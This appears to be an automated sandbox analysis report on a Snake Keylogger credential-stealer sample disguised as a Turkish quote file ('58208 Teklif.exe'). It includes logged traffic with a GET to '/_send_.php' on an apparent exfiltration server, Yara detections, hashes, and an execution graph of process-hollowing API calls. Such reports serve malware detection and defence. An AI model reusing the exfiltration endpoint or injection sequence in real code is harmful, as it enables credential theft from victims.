                                                    2024-04-08 11:01:56 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                    2024-04-08 11:01:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.1149727172.67.169.184437580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-08 11:01:57 UTC79OUTGET /_send_.php?TS HTTP/1.1
                                                    Host: scratchdreams.tk
                                                    Connection: Keep-Alive
                                                    2024-04-08 11:02:28 UTC731INHTTP/1.1 522
                                                    Date: Mon, 08 Apr 2024 11:02:28 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 15
                                                    Connection: close
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6FP9JKsmyUIR2EQOWghuySeRFGCerggC%2FSerbHv7uSfBjSbBuqg2zNP6n7cL14kKG3umGkK3F5g3Vh4KvCnOnI26LiaqLR9P4mqFLbJLjHOhPz6iBHjI10FyJ8iju8rhckqm"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    X-Frame-Options: SAMEORIGIN
                                                    Referrer-Policy: same-origin
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    Server: cloudflare
                                                    CF-RAY: 8711c32968b07429-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-08 11:02:28 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                    Data Ascii: error code: 522


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:13:01:46
                                                    Start date:08/04/2024
                                                    Path:C:\Users\user\Desktop\58208 Teklif.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\58208 Teklif.exe"
                                                    Imagebase:0xd40000
                                                    File size:846'344 bytes
                                                    MD5 hash:DC59E080BC0BE8CEE52EC9E79CCC7E82
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:13:01:47
                                                    Start date:08/04/2024
                                                    Path:C:\Users\user\Desktop\58208 Teklif.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\58208 Teklif.exe"
                                                    Imagebase:0xb40000
                                                    File size:846'344 bytes
                                                    MD5 hash:DC59E080BC0BE8CEE52EC9E79CCC7E82
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:9.8%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:225
                                                      Total number of Limit Nodes:11
                                                      execution_graph 22858 779624b 22860 7796204 22858->22860 22859 7796406 22860->22858 22860->22859 22863 7796c49 22860->22863 22869 7796c58 22860->22869 22864 7796c6d 22863->22864 22875 7796c89 22864->22875 22896 7796cfe 22864->22896 22918 7796c98 22864->22918 22865 7796c7f 22865->22859 22870 7796c6d 22869->22870 22872 7796c89 12 API calls 22870->22872 22873 7796c98 12 API calls 22870->22873 22874 7796cfe 12 API calls 22870->22874 22871 7796c7f 22871->22859 22872->22871 22873->22871 22874->22871 22876 7796cb2 22875->22876 22939 7797a3a 22876->22939 22943 77971db 22876->22943 22947 7797399 22876->22947 22952 7797407 22876->22952 22956 7797105 22876->22956 22961 7797701 22876->22961 22965 779780e 22876->22965 22972 77979ae 22876->22972 22977 779722e 22876->22977 22981 77972ef 22876->22981 22985 779774f 22876->22985 22990 779754d 22876->22990 22995 779746b 22876->22995 23000 77973d6 22876->23000 23005 7797252 22876->23005 23009 7797652 22876->23009 23013 77976d3 22876->23013 23017 77975bc 22876->23017 22877 7796cba 22877->22865 22897 7796c8c 22896->22897 22898 7796d01 22896->22898 22900 7797399 2 API calls 22897->22900 22901 77971db 2 API calls 22897->22901 22902 7797a3a 2 API calls 22897->22902 22903 77975bc 2 API calls 22897->22903 22904 77976d3 2 API calls 22897->22904 22905 7797652 2 API calls 22897->22905 22906 7797252 2 API calls 22897->22906 22907 77973d6 2 API calls 22897->22907 22908 779746b 2 API calls 22897->22908 22909 779754d 2 API calls 22897->22909 22910 779774f 2 API calls 22897->22910 22911 77972ef 2 API calls 22897->22911 22912 779722e 2 API calls 22897->22912 22913 77979ae 2 API calls 22897->22913 22914 779780e 2 API calls 22897->22914 22915 7797701 2 API calls 22897->22915 22916 7797105 2 API calls 22897->22916 22917 7797407 2 API calls 22897->22917 22898->22865 22899 7796cba 22899->22865 22900->22899 22901->22899 22902->22899 22903->22899 22904->22899 22905->22899 22906->22899 22907->22899 22908->22899 22909->22899 22910->22899 22911->22899 22912->22899 22913->22899 22914->22899 22915->22899 22916->22899 22917->22899 22919 7796cb2 22918->22919 22921 7797399 2 API calls 22919->22921 22922 77971db 2 API calls 22919->22922 22923 7797a3a 2 API calls 22919->22923 22924 77975bc 2 API calls 22919->22924 22925 77976d3 2 API calls 22919->22925 22926 7797652 2 API calls 22919->22926 22927 7797252 2 API calls 22919->22927 22928 77973d6 2 API calls 22919->22928 22929 779746b 2 API calls 22919->22929 22930 779754d 2 API calls 22919->22930 22931 779774f 2 API calls 22919->22931 22932 77972ef 2 API calls 22919->22932 22933 779722e 2 API calls 22919->22933 22934 77979ae 2 API calls 22919->22934 22935 779780e 2 API calls 22919->22935 22936 7797701 2 API calls 22919->22936 22937 7797105 2 API calls 22919->22937 22938 7797407 2 API calls 22919->22938 22920 7796cba 22920->22865 22921->22920 22922->22920 22923->22920 22924->22920 22925->22920 22926->22920 22927->22920 22928->22920 22929->22920 22930->22920 22931->22920 22932->22920 22933->22920 22934->22920 22935->22920 22936->22920 22937->22920 22938->22920 23021 7795b58 22939->23021 23025 7795b60 22939->23025 22940 7797a5e 22944 779720f 22943->22944 23029 7795de8 22943->23029 23033 7795ddc 22943->23033 22944->22877 22948 779739d 22947->22948 23037 7795a98 22948->23037 23041 7795aa0 22948->23041 22949 7797787 22953 779722e 22952->22953 22953->22877 22953->22952 23045 77954df 22953->23045 23049 77954e0 22953->23049 22957 7797112 22956->22957 22959 7795de8 CreateProcessA 22957->22959 22960 7795ddc CreateProcessA 22957->22960 22958 779720f 22958->22877 22959->22958 22960->22958 22962 7797722 22961->22962 23053 7795c48 22962->23053 23057 7795c50 22962->23057 22966 7797814 22965->22966 22967 7797815 22966->22967 22968 7795c48 ReadProcessMemory 22966->22968 22969 7795c50 ReadProcessMemory 22966->22969 22970 7795c48 ReadProcessMemory 22967->22970 22971 7795c50 ReadProcessMemory 22967->22971 22968->22967 22969->22967 22970->22967 22971->22967 22973 77979c9 22972->22973 22975 7795b58 WriteProcessMemory 22973->22975 22976 7795b60 WriteProcessMemory 22973->22976 22974 77979ea 22975->22974 22976->22974 22978 779723a 22977->22978 22978->22877 22978->22977 22979 77954df ResumeThread 22978->22979 22980 77954e0 ResumeThread 22978->22980 22979->22978 22980->22978 22982 77972fd 22981->22982 22983 7795c48 ReadProcessMemory 22982->22983 22984 7795c50 ReadProcessMemory 22982->22984 22983->22982 22984->22982 22986 7797755 22985->22986 22988 7795b58 WriteProcessMemory 22986->22988 22989 7795b60 WriteProcessMemory 22986->22989 22987 77979ea 22988->22987 22989->22987 22991 7797570 22990->22991 22993 7795b58 WriteProcessMemory 22991->22993 22994 7795b60 WriteProcessMemory 22991->22994 22992 77975fe 22993->22992 22994->22992 22996 7797476 22995->22996 23061 77959c8 22996->23061 23065 77959c7 22996->23065 22997 7797491 23001 779739d 23000->23001 23003 7795a98 VirtualAllocEx 23001->23003 23004 7795aa0 VirtualAllocEx 23001->23004 23002 7797787 23003->23002 23004->23002 23006 779725f 23005->23006 23007 7795c48 ReadProcessMemory 23006->23007 23008 7795c50 ReadProcessMemory 23006->23008 23007->23006 23008->23006 23011 77959c8 Wow64SetThreadContext 23009->23011 23012 77959c7 Wow64SetThreadContext 23009->23012 23010 779766c 23011->23010 23012->23010 23014 779722e 23013->23014 23014->22877 23015 77954df ResumeThread 23014->23015 23016 77954e0 ResumeThread 23014->23016 23015->23014 23016->23014 23018 779722e 23017->23018 23018->22877 23019 77954df ResumeThread 23018->23019 23020 77954e0 ResumeThread 23018->23020 23019->23018 23020->23018 23022 7795ba8 WriteProcessMemory 23021->23022 23024 7795bff 23022->23024 23024->22940 23026 7795ba8 WriteProcessMemory 23025->23026 23028 7795bff 23026->23028 23028->22940 23030 7795e71 CreateProcessA 23029->23030 23032 7796033 23030->23032 23034 7795e71 CreateProcessA 23033->23034 23036 7796033 23034->23036 23038 7795ae0 VirtualAllocEx 23037->23038 23040 7795b1d 23038->23040 23040->22949 23042 7795ae0 VirtualAllocEx 23041->23042 23044 7795b1d 23042->23044 23044->22949 23046 7795520 ResumeThread 23045->23046 23048 7795551 23046->23048 23048->22953 23050 7795520 ResumeThread 23049->23050 23052 7795551 23050->23052 23052->22953 23054 7795c9b ReadProcessMemory 23053->23054 23056 7795cdf 23054->23056 23056->22962 23058 7795c9b ReadProcessMemory 23057->23058 23060 7795cdf 23058->23060 23060->22962 23062 7795a0d Wow64SetThreadContext 23061->23062 23064 7795a55 23062->23064 23064->22997 23066 7795a0d Wow64SetThreadContext 23065->23066 23068 7795a55 23066->23068 23068->22997 22811 155d300 22812 155d346 GetCurrentProcess 22811->22812 22814 155d391 22812->22814 22815 155d398 GetCurrentThread 22812->22815 22814->22815 22816 155d3d5 GetCurrentProcess 22815->22816 22817 155d3ce 22815->22817 22818 155d40b 22816->22818 22817->22816 22819 155d433 GetCurrentThreadId 22818->22819 22820 155d464 22819->22820 22825 155af70 22826 155af71 22825->22826 22830 155b059 22826->22830 22838 155b068 22826->22838 22827 155af7f 22831 155b065 22830->22831 22832 155b09c 22831->22832 22846 155b300 22831->22846 22850 155b2f0 22831->22850 22832->22827 22833 155b094 22833->22832 22834 155b2a0 GetModuleHandleW 22833->22834 22835 155b2cd 22834->22835 22835->22827 22839 155b069 22838->22839 22840 155b09c 22839->22840 22844 155b300 LoadLibraryExW 22839->22844 22845 155b2f0 LoadLibraryExW 22839->22845 22840->22827 22841 155b094 22841->22840 22842 155b2a0 GetModuleHandleW 22841->22842 22843 155b2cd 22842->22843 22843->22827 22844->22841 22845->22841 22847 155b314 22846->22847 22849 155b339 22847->22849 22854 155ad1c 22847->22854 22849->22833 22851 155b300 22850->22851 22852 155ad1c LoadLibraryExW 22851->22852 22853 155b339 22851->22853 22852->22853 22853->22833 22855 155b4e0 LoadLibraryExW 22854->22855 22857 155b559 22855->22857 22857->22849 22821 77991a0 FindCloseChangeNotification 22822 7799207 22821->22822 23069 7797e40 23070 7797fcb 23069->23070 23072 7797e66 23069->23072 23072->23070 23073 7794408 23072->23073 23074 77980c0 PostMessageW 23073->23074 23075 779812c 23074->23075 23075->23072 22823 155d548 DuplicateHandle 22824 155d5de 22823->22824 23076 1554668 23077 155467a 23076->23077 23078 1554686 23077->23078 23080 1554778 23077->23080 23081 155479d 23080->23081 23085 1554878 23081->23085 23089 1554888 23081->23089 23087 1554882 23085->23087 23086 155498c 23086->23086 23087->23086 23093 15544e4 23087->23093 23090 15548af 23089->23090 23091 155498c 23090->23091 23092 15544e4 CreateActCtxA 23090->23092 23092->23091 23094 1555918 CreateActCtxA 23093->23094 23096 15559db 23094->23096 23096->23096

                                                      Executed Functions

                                                      Function 07790007 Relevance: .1, Instructions: 82COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8488df357147a6ae90d1e0a3a2957eea2ba4476ddd5b849831be642b5990e87b
                                                      • Instruction ID: 5cc44738978a551974ebfb0b563801765e2e3d5802c7f45c988b2440f1ffbaf5
                                                      • Opcode Fuzzy Hash: 8488df357147a6ae90d1e0a3a2957eea2ba4476ddd5b849831be642b5990e87b
                                                      • Instruction Fuzzy Hash: 7E314FB1D153498FDB09CF6AD8142DEBFF6AF8A310F04C0AAD408AB265DB741949CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07790040 Relevance: .1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 23618efc4fee4f0100aea34aa22c0c85d41e3655a52a95219d72e6ab79134c1a
                                                      • Instruction ID: d1ee6b7d1b1c1a1392cbb5fead6cfd2e236603df567675efaa90f970c5c95a0f
                                                      • Opcode Fuzzy Hash: 23618efc4fee4f0100aea34aa22c0c85d41e3655a52a95219d72e6ab79134c1a
                                                      • Instruction Fuzzy Hash: 0F2103B0D116198BEB18CFABD8447EEFAF6AFC9300F04C07A940866264DB74094ACF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0155D2F0 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 301 155d2f0-155d38f GetCurrentProcess 305 155d391-155d397 301->305 306 155d398-155d3cc GetCurrentThread 301->306 305->306 307 155d3d5-155d409 GetCurrentProcess 306->307 308 155d3ce-155d3d4 306->308 309 155d412-155d42d call 155d4d1 307->309 310 155d40b-155d411 307->310 308->307 314 155d433-155d462 GetCurrentThreadId 309->314 310->309 315 155d464-155d46a 314->315 316 155d46b-155d4cd 314->316 315->316
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0155D37E
                                                      • GetCurrentThread.KERNEL32 ref: 0155D3BB
                                                      • GetCurrentProcess.KERNEL32 ref: 0155D3F8
                                                      • GetCurrentThreadId.KERNEL32 ref: 0155D451
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: e50a834ae59ec7039ef24727be9f6ef4597678e938207bdd69307b3b5e659188
                                                      • Instruction ID: 9009b4f6a3edfae708bb8b8c9e98887aa863edeef31c37e0ecf2a893c6a8ca52
                                                      • Opcode Fuzzy Hash: e50a834ae59ec7039ef24727be9f6ef4597678e938207bdd69307b3b5e659188
                                                      • Instruction Fuzzy Hash: 1A5154B19002498FEB54CFA9D548BEEBFF1FB88304F20845AE519BB260D7745948CF61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0155D300 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 323 155d300-155d38f GetCurrentProcess 327 155d391-155d397 323->327 328 155d398-155d3cc GetCurrentThread 323->328 327->328 329 155d3d5-155d409 GetCurrentProcess 328->329 330 155d3ce-155d3d4 328->330 331 155d412-155d42d call 155d4d1 329->331 332 155d40b-155d411 329->332 330->329 336 155d433-155d462 GetCurrentThreadId 331->336 332->331 337 155d464-155d46a 336->337 338 155d46b-155d4cd 336->338 337->338
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0155D37E
                                                      • GetCurrentThread.KERNEL32 ref: 0155D3BB
                                                      • GetCurrentProcess.KERNEL32 ref: 0155D3F8
                                                      • GetCurrentThreadId.KERNEL32 ref: 0155D451
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 53bee977fe0c4f00b8e94463ea46a6592a7e3734e00c17aa626ee2aaadf8255f
                                                      • Instruction ID: 7993c9c93ba701789fa59cbc51108b6e8d70cb4f1cdaf10e0eb863079ee6ee80
                                                      • Opcode Fuzzy Hash: 53bee977fe0c4f00b8e94463ea46a6592a7e3734e00c17aa626ee2aaadf8255f
                                                      • Instruction Fuzzy Hash: 255144B09002499FEB58DFAAD548B9EBFF1BF88304F20841AE519B7260D7746948CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07795DDC Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 386 7795ddc-7795e7d 388 7795e7f-7795e89 386->388 389 7795eb6-7795ed6 386->389 388->389 390 7795e8b-7795e8d 388->390 394 7795ed8-7795ee2 389->394 395 7795f0f-7795f3e 389->395 392 7795e8f-7795e99 390->392 393 7795eb0-7795eb3 390->393 396 7795e9b 392->396 397 7795e9d-7795eac 392->397 393->389 394->395 399 7795ee4-7795ee6 394->399 405 7795f40-7795f4a 395->405 406 7795f77-7796031 CreateProcessA 395->406 396->397 397->397 398 7795eae 397->398 398->393 400 7795f09-7795f0c 399->400 401 7795ee8-7795ef2 399->401 400->395 403 7795ef4 401->403 404 7795ef6-7795f05 401->404 403->404 404->404 408 7795f07 404->408 405->406 407 7795f4c-7795f4e 405->407 417 779603a-77960c0 406->417 418 7796033-7796039 406->418 409 7795f71-7795f74 407->409 410 7795f50-7795f5a 407->410 408->400 409->406 412 7795f5c 410->412 413 7795f5e-7795f6d 410->413 412->413 413->413 414 7795f6f 413->414 414->409 428 77960d0-77960d4 417->428 429 77960c2-77960c6 417->429 418->417 431 77960e4-77960e8 428->431 432 77960d6-77960da 428->432 429->428 430 77960c8 429->430 430->428 434 77960f8-77960fc 431->434 435 77960ea-77960ee 431->435 432->431 433 77960dc 432->433 433->431 436 779610e-7796115 434->436 437 77960fe-7796104 434->437 435->434 438 77960f0 435->438 439 779612c 436->439 440 7796117-7796126 436->440 437->436 438->434 442 779612d 439->442 440->439 442->442
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0779601E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: f671a1a22a177d8ba1e91a8dfbf779619f192b8427c2815e3621ec5e75aee7e3
                                                      • Instruction ID: a9765c21e28caf04d237967e083bcabc11a65392797c07c6e12925e640db013c
                                                      • Opcode Fuzzy Hash: f671a1a22a177d8ba1e91a8dfbf779619f192b8427c2815e3621ec5e75aee7e3
                                                      • Instruction Fuzzy Hash: 0FA18CB0D0122ACFDF11CF68D881BEDBBB2BF44354F04856AE808A7280DB759985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07795DE8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 443 7795de8-7795e7d 445 7795e7f-7795e89 443->445 446 7795eb6-7795ed6 443->446 445->446 447 7795e8b-7795e8d 445->447 451 7795ed8-7795ee2 446->451 452 7795f0f-7795f3e 446->452 449 7795e8f-7795e99 447->449 450 7795eb0-7795eb3 447->450 453 7795e9b 449->453 454 7795e9d-7795eac 449->454 450->446 451->452 456 7795ee4-7795ee6 451->456 462 7795f40-7795f4a 452->462 463 7795f77-7796031 CreateProcessA 452->463 453->454 454->454 455 7795eae 454->455 455->450 457 7795f09-7795f0c 456->457 458 7795ee8-7795ef2 456->458 457->452 460 7795ef4 458->460 461 7795ef6-7795f05 458->461 460->461 461->461 465 7795f07 461->465 462->463 464 7795f4c-7795f4e 462->464 474 779603a-77960c0 463->474 475 7796033-7796039 463->475 466 7795f71-7795f74 464->466 467 7795f50-7795f5a 464->467 465->457 466->463 469 7795f5c 467->469 470 7795f5e-7795f6d 467->470 469->470 470->470 471 7795f6f 470->471 471->466 485 77960d0-77960d4 474->485 486 77960c2-77960c6 474->486 475->474 488 77960e4-77960e8 485->488 489 77960d6-77960da 485->489 486->485 487 77960c8 486->487 487->485 491 77960f8-77960fc 488->491 492 77960ea-77960ee 488->492 489->488 490 77960dc 489->490 490->488 493 779610e-7796115 491->493 494 77960fe-7796104 491->494 492->491 495 77960f0 492->495 496 779612c 493->496 497 7796117-7796126 493->497 494->493 495->491 499 779612d 496->499 497->496 499->499
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0779601E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 478693ca9c4855fd20ccf2f5e71c3f5cbda2f4f53f3ac71291530ce9ee46e90a
                                                      • Instruction ID: 2ec664e51a52eb3da46cab7c44e0f8e2b44ca1ece36042c87bf6a3afc5498bed
                                                      • Opcode Fuzzy Hash: 478693ca9c4855fd20ccf2f5e71c3f5cbda2f4f53f3ac71291530ce9ee46e90a
                                                      • Instruction Fuzzy Hash: 45918DB0D0122ACFDF11CF68D881BEDBBB2BF44314F04856AE809A7280DB759995CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0155B068 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 500 155b068-155b077 502 155b0a3-155b0a7 500->502 503 155b079-155b086 call 1559ad4 500->503 505 155b0a9-155b0b3 502->505 506 155b0bb-155b0fc 502->506 509 155b09c 503->509 510 155b088 503->510 505->506 512 155b0fe-155b106 506->512 513 155b109-155b117 506->513 509->502 556 155b08e call 155b300 510->556 557 155b08e call 155b2f0 510->557 512->513 514 155b119-155b11e 513->514 515 155b13b-155b13d 513->515 517 155b120-155b127 call 155acd0 514->517 518 155b129 514->518 520 155b140-155b147 515->520 516 155b094-155b096 516->509 519 155b1d8-155b298 516->519 522 155b12b-155b139 517->522 518->522 551 155b2a0-155b2cb GetModuleHandleW 519->551 552 155b29a-155b29d 519->552 523 155b154-155b15b 520->523 524 155b149-155b151 520->524 522->520 527 155b15d-155b165 523->527 528 155b168-155b171 call 155ace0 523->528 524->523 527->528 532 155b173-155b17b 528->532 533 155b17e-155b183 528->533 532->533 534 155b185-155b18c 533->534 535 155b1a1-155b1ae 533->535 534->535 537 155b18e-155b19e call 155acf0 call 155ad00 534->537 542 155b1d1-155b1d7 535->542 543 155b1b0-155b1ce 535->543 537->535 543->542 553 155b2d4-155b2e8 551->553 554 155b2cd-155b2d3 551->554 552->551 554->553 556->516 557->516
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0155B2BE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 424f0045f7379a2ac1fe33d296c52a511e513e79979c144df9bd2e2fa473746a
                                                      • Instruction ID: 3d1627a459ad074aaae1dfd7b908c16a1f1e3f38480d4c89de22487ad40e6cdc
                                                      • Opcode Fuzzy Hash: 424f0045f7379a2ac1fe33d296c52a511e513e79979c144df9bd2e2fa473746a
                                                      • Instruction Fuzzy Hash: 47714570A00B058FD7A4DF6AD45475ABBF2FF88300F108A2ED84ADBA50D775E949CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0155590D Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 558 155590d-1555916 559 1555918-15559d9 CreateActCtxA 558->559 561 15559e2-1555a3c 559->561 562 15559db-15559e1 559->562 569 1555a3e-1555a41 561->569 570 1555a4b-1555a4f 561->570 562->561 569->570 571 1555a51-1555a5d 570->571 572 1555a60 570->572 571->572 573 1555a61 572->573 573->573
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 015559C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: bea9ea4389d8e00f245d6a27e1ab8839e15c31d6a131e0886d952dc6ac31677d
                                                      • Instruction ID: ede9316e83ac489cfe8819de06dc06e3c8c2eb38adab427e2dedaecf5c30ba36
